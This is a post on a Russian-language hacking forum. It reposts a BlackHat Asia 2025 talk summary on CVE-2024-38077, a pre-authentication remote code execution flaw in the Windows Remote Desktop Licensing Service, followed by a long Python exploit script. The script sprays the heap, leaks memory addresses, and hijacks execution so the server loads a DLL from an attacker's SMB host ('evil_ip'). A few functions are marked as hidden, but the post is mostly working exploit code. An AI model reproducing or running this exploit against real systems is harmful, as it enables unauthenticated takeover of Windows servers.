• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга [BlackHat Asia 2025] One Bug to Rule Them All: Stably Exploiting a Preauth RCE Vulnerability on Windows Server 2025

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3
Забанен
Регистрация
19.12.2018
Сообщения
3 301
Решения
11
Реакции
4 622
Депозит
0.0001
Пожалуйста, обратите внимание, что пользователь заблокирован
Description
As the security protection mechanisms of the Windows operating system are constantly being proposed and applied, it is becoming increasingly difficult to find exploitable vulnerabilities on current Windows, especially vulnerabilities that can cause preauth 0-click RCE. But, is there really no such vulnerabilities?

A few months ago, we conducted an in-depth analysis of the Windows Remote Desktop Services and we found several Preauth RCE vulnerabilities in the Remote Desktop Licensing Service, some of them will lead to unauthenticated non-sandboxed 0-click RCE.

In this talk, we will explore the attack surface of the Remote Desktop Licensing Service, focusing on the newly identified vulnerability, CVE-2024-38077, which impacts all versions of Windows Server from 2003 to 2025. Despite Microsoft's various fortifications to Windows for decades and we didn't see preauth 0-click RCE in Windows for years, we still can exploit a single memory corruption vulnerability to complete the 0-click preauth RCE on Windows. We will then share our approach to bypassing all the mitigations on the latest Windows Server 2025 and build a 0-click preauth RCE exploit by using only CVE-2024-38077.
blackhat.com/asia-25/briefings/schedule/#one-bug-to-rule-them-all-stably-exploiting-a-preauth-rce-vulnerability-on-windows-server--44144

слайды
https://i.blackhat.com/Asia-25/Asia-25-Peng-One-Bug-to-Rule-Them-All.pdf

запись в блоге
https://sites.google.com/site/zhiniangpeng/blogs/MadLicense

Python:
import struct, hashlib, argparse
from time import sleep
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL
from impacket.dcerpc.v5.dtypes import BOOL,ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, BBYTE, LPSTR, PUINT, WCHAR
from impacket.uuid import uuidtup_to_bin
from Crypto.Util.number import bytes_to_long
from wincrypto import CryptEncrypt, CryptImportKey



UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0"))
TRY_TIMES = 3
SLEEP_TIME = 210
DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE"
dce = None
rpctransport = None
ctx_handle = None
handle_lists = []
leak_idx = 0
heap_base = 0
ntdll_base = 0
peb_base = 0
pe_base = 0
rpcrt4_base = 0
kernelbase_base = 0



def p8(x):
    return struct.pack("B", x)

def p16(x):
    return struct.pack("H", x)

def p32(x):
    return struct.pack("I", x)

def p64(x):
    return struct.pack("Q", x)


class CONTEXT_HANDLE(NDRSTRUCT):

    structure = (

        ("Data", "20s=b"),

    )

    def getAlignment(self):

        return 4

class TLSRpcGetVersion(NDRCALL):

    opnum = 0

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

        ("version", PULONG),

    )

class TLSRpcGetVersionResponse(NDRCALL):

    structure = (

        ("version", ULONG),

    )

class TLSRpcConnect(NDRCALL):

    opnum = 1

class TLSRpcConnectResponse(NDRCALL):

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

    )

class TLSBLOB(NDRSTRUCT):

    structure = (

        ("cbData", ULONG),

        ("pbData", PBYTE),

    )

class TLSCRYPT_ALGORITHM_IDENTIFIER(NDRSTRUCT):

    structure = (

        ("pszObjId", LPSTR),

        ("Parameters", TLSBLOB),

    )

class TLSCRYPT_BIT_BLOB(NDRSTRUCT):

    structure = (

        ("cbData", DWORD),

        ("pbData", PBYTE),

        ("cUnusedBits", DWORD),

    )

class TLSCERT_PUBLIC_KEY_INFO(NDRSTRUCT):

    structure = (

        ("Algorithm", TLSCRYPT_ALGORITHM_IDENTIFIER),

        ("PublicKey", TLSCRYPT_BIT_BLOB),

    )

class PTLSCERT_PUBLIC_KEY_INFO(NDRPOINTER):

    referent = (

        ("Data", TLSCERT_PUBLIC_KEY_INFO),

    )

class TLSCERT_EXTENSION(NDRSTRUCT):

    structure = (

        ("pszObjId", LPSTR),

        ("fCritical", BOOL),

        ("Value", TLSBLOB),

    )

class TLSCERT_EXTENSION_ARRAY(NDRUniConformantArray):

    item = TLSCERT_EXTENSION

class PTLSCERT_EXTENSION(NDRPOINTER):

    referent = (

        ("Data", TLSCERT_EXTENSION_ARRAY),

    )

class TLSHYDRACERTREQUEST(NDRSTRUCT):

    structure = (

        ("dwHydraVersion", DWORD),

        ("cbEncryptedHwid", DWORD),

        ("pbEncryptedHwid", PBYTE),

        ("szSubjectRdn", PWCHAR),

        ("pSubjectPublicKeyInfo", PTLSCERT_PUBLIC_KEY_INFO),

        ("dwNumCertExtension", DWORD),

        ("pCertExtensions", PTLSCERT_EXTENSION),

    )

class PTLSHYDRACERTREQUEST(NDRPOINTER):

    referent = (

        ("Data", TLSHYDRACERTREQUEST),

    )

class TLSRpcRequestTermServCert(NDRCALL):

    opnum = 34

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("pbRequest", TLSHYDRACERTREQUEST),

        ("cbChallengeData", DWORD),

        ("pdwErrCode", DWORD),

    )

class TLSRpcRequestTermServCertResponse(NDRCALL):

    structure = (

        ("cbChallengeData", ULONG),

        ("pbChallengeData", PBYTE),

        ("pdwErrCode", ULONG),

    )

class TLSRpcRetrieveTermServCert(NDRCALL):

    opnum = 35

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("cbResponseData", DWORD),

        ("pbResponseData", BBYTE),

        ("cbCert", DWORD),

        ("pbCert", BBYTE),

        ("pdwErrCode", DWORD),

    )

class TLSRpcRetrieveTermServCertResponse(NDRCALL):

    structure = (

        ("cbCert", PUINT),

        ("pbCert", BBYTE),

        ("pdwErrCode", PUINT),

    )

class TLSRpcTelephoneRegisterLKP(NDRCALL):

    opnum = 49

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

        ("dwData", ULONG),

        ("pbData", BBYTE),

        ("pdwErrCode", ULONG)

    )

class TLSRpcTelephoneRegisterLKPResponse(NDRCALL):

    structure = (

        ("pdwErrCode", ULONG)

    )

class TLSCHALLENGEDATA(NDRSTRUCT):

    structure = (

        ("dwVersion", ULONG),

        ("dwRandom", ULONG),

        ("cbChallengeData", ULONG),

        ("pbChallengeData", PBYTE),

        ("cbReservedData", ULONG),

        ("pbReservedData", PBYTE),

    )

class PTLSCHALLENGEDATA(NDRPOINTER):

    referent = (

        ("Data", TLSCHALLENGEDATA),

    )

class TLSCHALLENGERESPONSEDATA(NDRSTRUCT):

    structure = (

        ("dwVersion", ULONG),

        ("cbResponseData", ULONG),

        ("pbResponseData", PBYTE),

        ("cbReservedData", ULONG),

        ("pbReservedData", PBYTE),

    )

class PTLSCHALLENGERESPONSEDATA(NDRPOINTER):

    referent = (

        ("Data", TLSCHALLENGERESPONSEDATA),

    )

class TLSRpcChallengeServer(NDRCALL):

    opnum = 44

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("dwClientType", ULONG),

        ("pClientChallenge", TLSCHALLENGEDATA),

        ("pdwErrCode", ULONG),

    )

class TLSRpcChallengeServerResponse(NDRCALL):

    structure = (

        ("pServerResponse", PTLSCHALLENGERESPONSEDATA),

        ("pServerChallenge", PTLSCHALLENGEDATA),

        ("pdwErrCode", ULONG),

    )

class TLSRpcResponseServerChallenge(NDRCALL):

    opnum = 45

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("pClientResponse", TLSCHALLENGERESPONSEDATA),

        ("pdwErrCode", ULONG),

    )

class TLSRpcResponseServerChallengeResponse(NDRCALL):

    structure = (

        ("pdwErrCode", ULONG),

    )

class TLSRpcRegisterLicenseKeyPack(NDRCALL):

    opnum = 38

    structure = (

        ("lpContext", CONTEXT_HANDLE),

        ("arg_1", BBYTE),

        ("arg_2", ULONG),

        ("arg_3", BBYTE),

        ("arg_4", ULONG),

        ("lpKeyPackBlob", BBYTE),

        ("arg_6", ULONG),

        ("pdwErrCode", ULONG),

    )

class TLSRpcRegisterLicenseKeyPackResponse(NDRCALL):

    structure = (

        ("pdwErrCode", ULONG),

    )

class WIDESTR_STRIPPED(WIDESTR):

    length = None

    def __getitem__(self, key):

        if key == 'Data':

            return self.fields[key].decode('utf-16le').rstrip('\x00')

        else:

            return NDR.__getitem__(self,key)

    def getDataLen(self, data, offset=0):

        if self.length is None:

            return super().getDataLen(data, offset)

        return self.length * 2

class WCHAR_ARRAY_256(WIDESTR_STRIPPED):

    length = 256

class LSKeyPack(NDRSTRUCT):

    structure = (

        ("dwVersion", DWORD),

        ("ucKeyPackType", UCHAR),

        ("szCompanyName", WCHAR_ARRAY_256),

        ("szKeyPackId", WCHAR_ARRAY_256),

        ("szProductName", WCHAR_ARRAY_256),

        ("szProductId", WCHAR_ARRAY_256),

        ("szProductDesc", WCHAR_ARRAY_256),

        ("wMajorVersion", WORD),

        ("wMinorVersion", WORD),

        ("dwPlatformType", DWORD),

        ("ucLicenseType", UCHAR),

        ("dwLanguageId", DWORD),

        ("ucChannelOfPurchase", UCHAR),

        ("szBeginSerialNumber", WCHAR_ARRAY_256),

        ("dwTotalLicenseInKeyPack", DWORD),

        ("dwProductFlags", DWORD),

        ("dwKeyPackId", DWORD),

        ("ucKeyPackStatus", UCHAR),

        ("dwActivateDate", DWORD),

        ("dwExpirationDate", DWORD),

        ("dwNumberOfLicenses", DWORD),

    )

class LPLSKeyPack(NDRPOINTER):

    referent = (

        ("Data", LSKeyPack),

    )

class TLSRpcKeyPackEnumNext(NDRCALL):

    opnum = 13

    structure = (

        ("phContext", CONTEXT_HANDLE),

        ("lpKeyPack", LPLSKeyPack),

        ("pdwErrCode", ULONG),

    )

class TLSRpcKeyPackEnumNextResponse(NDRCALL):

    structure = (

        ("pdwErrCode", ULONG),

    )

class TLSRpcDisconnect(NDRCALL):

    opnum = 2

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

    )

class TLSRpcDisconnectResponse(NDRCALL):

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

    )

class TLSRpcGetServerName(NDRCALL):

    opnum = 4

    structure = (

        ("ctx_handle", CONTEXT_HANDLE),

        ("serverName", WCHAR),

        ("nameLen", ULONG),

        ("errCode", ULONG),

    )

class TLSRpcGetServerNameResponse(NDRCALL):

    structure = (

        ("serverName", WCHAR),

        ("nameLen", ULONG),

        ("pdwErrCode", ULONG),

    )

def b24encode(data, charmap):

    data = data[::-1]

    data = bytes_to_long(data)

    enc = b""

    while data != 0:

        tmp = data % len(charmap)

        data //= len(charmap)

        enc += charmap[tmp]

    return enc[::-1]

def spray_lfh_chunk(size, loopsize):

    payload = b"\x00" * size

    reg_lic_keypack = construct_TLSRpcRegisterLicenseKeyPack(payload)

    for _ in range(loopsize):

        dce.request(reg_lic_keypack)

def disconnect(handle):

    global dce

    disconn = TLSRpcDisconnect()

    disconn["ctx_handle"] = handle

    disconn_res = dce.request(disconn)

    ret = disconn_res["ctx_handle"]

    return ret

def handles_free():

    global handle_lists, heap_base

    sleep(7)

    for i in range(0x8):

        handle = handle_lists[0x400 + i * 2]

        disconnect(handle)

        handle_lists.remove(handle)

def spray_handles(times):

    global dce, handle_lists

    handle_lists = []

    for _ in range(times):

        rpc_conn = TLSRpcConnect()

        res_rpc_conn = dce.request(rpc_conn)

        handle = res_rpc_conn["ctx_handle"]

        handle_lists.append(handle)

def spray_fake_obj(reg_lic_keypack, times = 0x300):

    global dce

    for i in range(times):

        dce.request(reg_lic_keypack)

def construct_TLSRpcTelephoneRegisterLKP(payload):

    global ctx_handle

    print("Hidden to prevent abusing")

    return tls_register_LKP

def construct_overflow_arbread_buf(addr, padding):

    payload = b""

    payload += p64(addr)

    if padding:

        payload += p32(0)

        payload += p32(0)

        payload += p32(1)

    tls_register_LKP = construct_TLSRpcTelephoneRegisterLKP(payload)

    return tls_register_LKP

def construct_overflow_fake_obj_buf(fake_obj_addr):

    payload = b""

    payload += p64(0)

    payload += p32(0)

    payload += p32(1)

    payload += p32(0)

    payload += p32(1)

    payload += p64(fake_obj_addr)

    payload += p8(1)

    tls_register_LKP = construct_TLSRpcTelephoneRegisterLKP(payload)

    return tls_register_LKP

def arb_read(addr, padding = False, passZero = False, leakHeapBaseOffset = 0):

    global leak_idx, handle_lists, dce, ctx_handle

    if leakHeapBaseOffset != 0:

        spray_lfh_chunk(0x20, 0x800)

    else:

        spray_lfh_chunk(0x20, 0x400)

    spray_handles(0xc00)

    handles_free()

    serverName = "a" * 0x10

    get_server_name = TLSRpcGetServerName()

    get_server_name["serverName"] = serverName + "\x00"

    get_server_name["nameLen"] = len(serverName) + 1

    get_server_name["errCode"] = 0

    if leakHeapBaseOffset != 0:

        tls_register_LKP = construct_overflow_arbread_buf(addr[0], padding)

    else:

        tls_register_LKP = construct_overflow_arbread_buf(addr, padding)

    pbData = b"c" * 0x10

    tls_blob = TLSBLOB()

    tls_blob["cbData"] = len(pbData)

    tls_blob["pbData"] = pbData

    tls_cert_extension = TLSCERT_EXTENSION()

    tls_cert_extension["pszObjId"] = "d" * 0x10 + "\x00"

    tls_cert_extension["fCritical"] = False

    tls_cert_extension["Value"] = tls_blob

    pbData2 = bytes.fromhex("3048024100bf1be06ab5c535d8e30a3b3dc616ec084ff4f5b9cfb2a30695ccc6c58c37356c938d3c165d980b07882a35f22ac2e580624cc08a2a3391e5e1f608f94764b27d0203010001")

    tls_crypt_bit_blob = TLSCRYPT_BIT_BLOB()

    tls_crypt_bit_blob["cbData"] = len(pbData2)

    tls_crypt_bit_blob["cbData"] = pbData2

    tls_crypt_bit_blob["cUnusedBits"] = 0

    tls_blob2 = TLSBLOB()

    tls_blob2["cbData"] = 0

    tls_blob2["pbData"] = b""

    tls_crypto_algorithm_identifier = TLSCRYPT_ALGORITHM_IDENTIFIER()

    tls_crypto_algorithm_identifier["pszObjId"] = "1.2.840.113549.1.1.1\x00"

    tls_crypto_algorithm_identifier["Parameters"] = tls_blob2

    tls_cert_public_key_info = TLSCERT_PUBLIC_KEY_INFO()

    tls_cert_public_key_info["Algorithm"] = tls_crypto_algorithm_identifier

    tls_cert_public_key_info["PublicKey"] = tls_crypt_bit_blob

    encryptedHwid = b"e" * 0x20

    hydra_cert_request = TLSHYDRACERTREQUEST()

    hydra_cert_request["dwHydraVersion"] = 0

    hydra_cert_request["cbEncryptedHwid"] = len(encryptedHwid)

    hydra_cert_request["pbEncryptedHwid"] = encryptedHwid

    hydra_cert_request["szSubjectRdn"] = "bbb\x00"

    hydra_cert_request["pSubjectPublicKeyInfo"] = tls_cert_public_key_info

    dwNumCertExtension = 0

    hydra_cert_request["dwNumCertExtension"] = dwNumCertExtension

    pbResponseData = b"a" * 0x10

    pbCert = b"b" * 0x10

    count = 0

    while True:

        count += 1

        sleep(5)

        try:

            dce.request(tls_register_LKP)

        except:

            pass

        retAddr = 0x0

        for handle in handle_lists[::-1]:

            if padding:

                get_server_name["ctx_handle"] = handle

                res_get_server_name = dce.request(get_server_name)

                err_code = res_get_server_name["pdwErrCode"]

                if (err_code == 0):

                    continue

            rpc_term_serv_cert = TLSRpcRequestTermServCert()

            rpc_term_serv_cert["phContext"] = handle

            rpc_term_serv_cert["pbRequest"] = hydra_cert_request

            rpc_term_serv_cert["cbChallengeData"] = 0x100

            rpc_term_serv_cert["pdwErrCode"] = 0

            rpc_retrieve_serv_cert = TLSRpcRetrieveTermServCert()

            rpc_retrieve_serv_cert["phContext"] = handle

            rpc_retrieve_serv_cert["cbResponseData"] = len(pbResponseData)

            rpc_retrieve_serv_cert["pbResponseData"] = pbResponseData

            rpc_retrieve_serv_cert["cbCert"] = len(pbCert)

            rpc_retrieve_serv_cert["pbCert"] = pbCert

            rpc_retrieve_serv_cert["pdwErrCode"] = 0

            try:

                res_rpc_term_serv_cert = dce.request(rpc_term_serv_cert)

                res_rpc_retrieve_serv_cert = dce.request(rpc_retrieve_serv_cert)

                data = res_rpc_retrieve_serv_cert["pbCert"]

                if b"n\x00c\x00a\x00c\x00n\x00" not in data:

                    handle_lists.remove(handle)

                    if leak_idx == 0:

                        if leakHeapBaseOffset != 0:

                            for i in range(len(data) - 6):

                                retAddr = data[i+4:i+6] + data[i+2:i+4] + data[i:i+2]

                                retAddr = bytes_to_long(retAddr) - leakHeapBaseOffset

                                if retAddr & 0xffff == 0:

                                    leak_idx = i

                                    print("[+] Find leak_idx: 0x{:x}".format(leak_idx))

                                    return retAddr

                        else:

                            print("[-] Finding leak_idx error!")

                            exit(-1)

                    else:

                        if passZero:

                            data = data[leak_idx:leak_idx+4]

                            retAddr = data[2:4] + data[0:2]

                        else:

                            data = data[leak_idx:leak_idx+6]

                            retAddr = data[4:6] + data[2:4] + data[0:2]

                        retAddr = bytes_to_long(retAddr)

                        return retAddr

            except:

                continue

        if leakHeapBaseOffset != 0:

            if count < len(addr):

                targetAddr = addr[count]

                tls_register_LKP = construct_overflow_arbread_buf(targetAddr, padding)

            else:

                print("G!")

                targetAddr = 0xdeaddeadbeefbeef

                tls_register_LKP = construct_overflow_arbread_buf(targetAddr, True)

        if leakHeapBaseOffset != 0:

            spray_lfh_chunk(0x20, 0x800)

        else:

            spray_lfh_chunk(0x20, 0x400)

        spray_handles(0xc00)

        handles_free()

def construct_fake_obj(heap_base, rpcrt4_base, kernelbase_base, arg1, NdrServerCall2_offset = 0x16f50, OSF_SCALL_offset = 0xdff10, LoadLibraryA_offset = 0xf6de0):

    print("Hidden to prevent abusing")

    payload=0

    fake_obj_addr=0

    return payload, fake_obj_addr

def construct_TLSRpcRegisterLicenseKeyPack(payload):

    global ctx_handle

    my_cert_exc = bytes.fromhex("hidden")

    my_cert_sig = bytes.fromhex("hidden")

    TEST_RSA_PUBLIC_MSKEYBLOB = bytes.fromhex("hidden")

    data = b"\x00" * 0x3c

    data += p32(len(payload))

    data += payload

    data += b"\x00" * 0x10

    rsa_pub_key = CryptImportKey(TEST_RSA_PUBLIC_MSKEYBLOB)

    encrypted_data = CryptEncrypt(rsa_pub_key, data)

    key = TEST_RSA_PUBLIC_MSKEYBLOB

    data = encrypted_data

    payload = b""

    payload += p32(len(key))

    payload += key

    payload += p32(len(data))

    payload += data

    reg_lic_keypack = TLSRpcRegisterLicenseKeyPack()

    reg_lic_keypack["lpContext"] = ctx_handle

    reg_lic_keypack["arg_1"] = my_cert_sig

    reg_lic_keypack["arg_2"] = len(my_cert_sig)

    reg_lic_keypack["arg_3"] = my_cert_exc

    reg_lic_keypack["arg_4"] = len(my_cert_exc)

    reg_lic_keypack["lpKeyPackBlob"] = payload

    reg_lic_keypack["arg_6"] = len(payload)

    reg_lic_keypack["pdwErrCode"] = 0

    return reg_lic_keypack

def construct_TLSRpcKeyPackEnumNext(handle):

    pLSKeyPack = LSKeyPack()

    pLSKeyPack["dwVersion"] = 1

    pLSKeyPack["ucKeyPackType"] = 1

    pLSKeyPack["szCompanyName"] = "a" * 255 + "\x00"

    pLSKeyPack["szKeyPackId"] = "a" * 255 + "\x00"

    pLSKeyPack["szProductName"] = "a" * 255 + "\x00"

    pLSKeyPack["szProductId"] = "a" * 255 + "\x00"

    pLSKeyPack["szProductDesc"] = "a" * 255 + "\x00"

    pLSKeyPack["wMajorVersion"] = 1

    pLSKeyPack["wMinorVersion"] = 1

    pLSKeyPack["dwPlatformType"] = 1

    pLSKeyPack["ucLicenseType"] = 1

    pLSKeyPack["dwLanguageId"] = 1

    pLSKeyPack["ucChannelOfPurchase"] = 1

    pLSKeyPack["szBeginSerialNumber"] = "a" * 255 + "\x00"

    pLSKeyPack["dwTotalLicenseInKeyPack"] = 1

    pLSKeyPack["dwProductFlags"] = 1

    pLSKeyPack["dwKeyPackId"] = 1

    pLSKeyPack["ucKeyPackStatus"] = 1

    pLSKeyPack["dwActivateDate"] = 1

    pLSKeyPack["dwExpirationDate"] = 1

    pLSKeyPack["dwNumberOfLicenses"] = 1

    rpc_key_pack_enum_next = TLSRpcKeyPackEnumNext()

    rpc_key_pack_enum_next["phContext"] = handle

    rpc_key_pack_enum_next["lpKeyPack"] = pLSKeyPack

    rpc_key_pack_enum_next["pdwErrCode"] = 0

    return rpc_key_pack_enum_next

def hijack_rip_and_rcx(heap_base, rpcrt4_base, kernelbase_base, arg1):

    global handle_lists, dce

    payload, fake_obj_addr = construct_fake_obj(heap_base, rpcrt4_base, kernelbase_base, arg1)

    print("[+] Calculate fake_obj_addr: 0x{:x}".format(fake_obj_addr))

    reg_lic_keypack = construct_TLSRpcRegisterLicenseKeyPack(payload)

    print("[*] Hijack rip and rcx")

    print("[*] rip: kernelbase!LoadLibraryA")

    print("[*] rcx: {0}".format(arg1))

    while True:

        spray_fake_obj(reg_lic_keypack)

        spray_lfh_chunk(0x20, 0x800)

        spray_handles(0xc00)

        handles_free()

        tls_register_LKP = construct_overflow_fake_obj_buf(fake_obj_addr)

        try:

            dce.request(tls_register_LKP)

        except:

            pass

        print("[*] Try to connect to server...")

        for handle in handle_lists[::-1]:

            rpc_key_pack_enum_next = construct_TLSRpcKeyPackEnumNext(handle)

            try:

                dce.request(rpc_key_pack_enum_next)

            except:

                pass

        print("[*] Check whether the exploit successed? (Y/N)\t")

        status = input("[*] ")

        if status == "Y" or status == "y":

            print("[+] Exploit success!")

            exit(0)

def connect_to_license_server(target_ip):

    global dce, rpctransport, ctx_handle

    stringbinding = epm.hept_map(target_ip, UUID, protocol="ncacn_ip_tcp")

    rpctransport = transport.DCERPCTransportFactory(stringbinding)

    rpctransport.set_connect_timeout(100)

    dce = rpctransport.get_dce_rpc()

    dce.set_auth_level(2)

    dce.connect()

    dce.bind(UUID)

    rpc_conn = TLSRpcConnect()

    res_rpc_conn = dce.request(rpc_conn)

    ctx_handle = res_rpc_conn["ctx_handle"]

    get_version = TLSRpcGetVersion()

    get_version["ctx_handle"] = ctx_handle

    get_version["version"] = 3

    res_get_version = dce.request(get_version)

    version = res_get_version["version"]

    print("[+] Get Server version: 0x{:x}".format(version))

    CHAL_DATA = b"a" * 0x10

    RESV_DATA = b"b" * 0x10

    cli_chal = TLSCHALLENGEDATA()

    cli_chal["dwVersion"] = 0x10000

    cli_chal["dwRandom"] = 0x4

    cli_chal["cbChallengeData"] = len(CHAL_DATA) + 1

    cli_chal["pbChallengeData"] = CHAL_DATA + b"\x00"

    cli_chal["cbReservedData"] = len(RESV_DATA) + 1

    cli_chal["pbReservedData"] = RESV_DATA + b"\x00"

    chal_server = TLSRpcChallengeServer()

    chal_server["phContext"] = ctx_handle

    chal_server["dwClientType"] = 0

    chal_server["pClientChallenge"] = cli_chal

    chal_server["pdwErrCode"] = 0

    chal_response = dce.request(chal_server)

    g_pszServerGuid = "d63a773e-6799-11d2-96ae-00c04fa3080d".encode("utf-16")[2:]

    dwRandom = chal_response["pServerChallenge"]["dwRandom"]

    pbChallengeData = b"".join(chal_response["pServerChallenge"]["pbChallengeData"])

    pbResponseData = hashlib.md5(pbChallengeData[:dwRandom] + g_pszServerGuid + pbChallengeData[dwRandom:]).digest()

    pClientResponse = TLSCHALLENGERESPONSEDATA()

    pClientResponse["dwVersion"] = 0x10000

    pClientResponse["cbResponseData"] = len(pbResponseData)

    pClientResponse["pbResponseData"] = pbResponseData

    pClientResponse["cbReservedData"] = 0

    pClientResponse["pbReservedData"] = ""

    resp_ser_chal = TLSRpcResponseServerChallenge()

    resp_ser_chal["phContext"] = ctx_handle

    resp_ser_chal["pClientResponse"] = pClientResponse

    resp_ser_chal["pdwErrCode"] = 0

    res_resp_ser_chal = dce.request(resp_ser_chal)

def leak_addr():

    global heap_base, ntdll_base, peb_base, pe_base, rpcrt4_base, kernelbase_base

    heap_offset_list = [0x100008, 0x100008, 0x400000, 0x600000, 0x800000, 0xb00000, 0xd00000, 0xf00000]

    heap_base = arb_read(heap_offset_list, leakHeapBaseOffset = 0x188)

    print("[+] Leak heap_base: 0x{:x}".format(heap_base))

    ntdll_base = arb_read(heap_base + 0x102048, padding = True) - 0x1bd2a8

    print("[+] Leak ntdll_base: 0x{:x}".format(ntdll_base))

    tls_bit_map_addr = ntdll_base + 0x1bd268

    print("[+] Leak tls_bit_map_addr: 0x{:x}".format(tls_bit_map_addr))

    peb_base = arb_read(tls_bit_map_addr, padding = True) - 0x80

    print("[+] Leak peb_base: 0x{:x}".format(peb_base))

    pe_base = arb_read(peb_base + 0x12, padding = True, passZero = True) << 16

    print("[+] Leak pe_base: 0x{:x}".format(pe_base))

    pe_import_table_addr = pe_base + 0x10000

    print("[+] Leak pe_import_table_addr: 0x{:x}".format(pe_import_table_addr))

    rpcrt4_base = arb_read(pe_import_table_addr, padding = True) - 0xa4d70

    print("[+] Leak rpcrt4_base: 0x{:x}".format(rpcrt4_base))

    rpcrt4_import_table_addr = rpcrt4_base + 0xe7bf0

    print("[+] Leak rpcrt4_import_table_addr: 0x{:x}".format(rpcrt4_import_table_addr))

    kernelbase_base = arb_read(rpcrt4_import_table_addr, padding = True) - 0x10aec0

    print("[+] Leak kernelbase_base: 0x{:x}".format(kernelbase_base))

def check_vuln(target_ip):

    print("[-] Not implemented yet.")

    return True

def pwn(target_ip, evil_ip, evil_dll_path, check_vuln_exist):

    global dce, rpctransport, handle_lists, leak_idx, heap_base, rpcrt4_base, kernelbase_base, pe_base, peb_base

    arg1 = "\\\\{0}{1}".format(evil_ip, evil_dll_path)

    print("-" * 0x50)

    print(DESCRIPTION)

    print("\ttarget_ip: {0}\n\tevil_ip: {1}\n\tevil_dll_path: {2}\n\tcheck_vuln_exist: {3}".format(target_ip, evil_ip, arg1, check_vuln_exist))

    if check_vuln_exist:

        if not check_vuln(target_ip):

            print("[-] Failed to check for vulnerability.")

            exit(0)

        else:

            print("[+] Target exists vulnerability, try exploit...")

    for i in range(TRY_TIMES):

        print("-" * 0x50)

        print("[*] Run exploit script for {0} / {1} times".format(i + 1, TRY_TIMES))

        try:

            connect_to_license_server(target_ip)

            leak_addr()

            hijack_rip_and_rcx(heap_base, rpcrt4_base, kernelbase_base, arg1)

            dce.disconnect()

            rpctransport.disconnect()

        except (ConnectionResetError, DCERPCException) as e:

            if i == TRY_TIMES - 1:

                print("[-] Crashed {0} times, run exploit script failed!".format(TRY_TIMES))

            else:  

                print("[-] Crashed, waiting for the service to restart, need {0} seconds...".format(SLEEP_TIME))

                sleep(SLEEP_TIME)

            handle_lists = []

            leak_idx = 0

            pass

if __name__ == '__main__':
    parse = argparse.ArgumentParser(description = DESCRIPTION)
    parse.add_argument("--target_ip", type=str, required=True, help="Target IP, eg: 192.168.120.1")
    parse.add_argument("--evil_ip", type=str, required=True, help="Evil IP, eg: 192.168.120.2")
    parse.add_argument("--evil_dll_path", type=str, required=False, default="\\smb\\evil_dll.dll", help="Evil dll path, eg: \\smb\\evil_dll.dll")
    parse.add_argument("--check_vuln_exist", type=bool, required=False, default=False, help="Check vulnerability exist before exploit")
    args = parse.parse_args()
    pwn(args.target_ip, args.evil_ip, args.evil_dll_path, args.check_vuln_exist)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх